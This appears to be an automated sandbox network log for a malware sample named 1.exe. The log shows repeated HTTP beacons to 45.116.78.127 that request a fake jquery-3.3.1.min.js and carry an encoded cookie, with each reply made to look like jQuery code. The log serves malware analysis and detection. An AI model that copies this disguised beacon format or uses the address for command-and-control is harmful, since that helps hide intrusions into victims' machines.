                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.55000645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:06 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:06 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:06 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:06 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.55000745.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:08 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:08 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:08 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:08 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.55000845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:09 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:10 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:10 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:10 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.55000945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:11 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:12 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:12 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:12 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.55001045.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:13 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:13 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:13 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:13 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.55001145.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:15 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:15 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:15 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:15 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.55001245.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:17 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:17 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:17 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:17 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                37192.168.2.55001345.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:19 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:19 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:19 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:20 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                38192.168.2.55001445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:21 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:22 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:22 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:22 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                39192.168.2.55001545.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:23 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:24 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:24 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:24 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                40192.168.2.55001645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:25 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:26 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:26 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
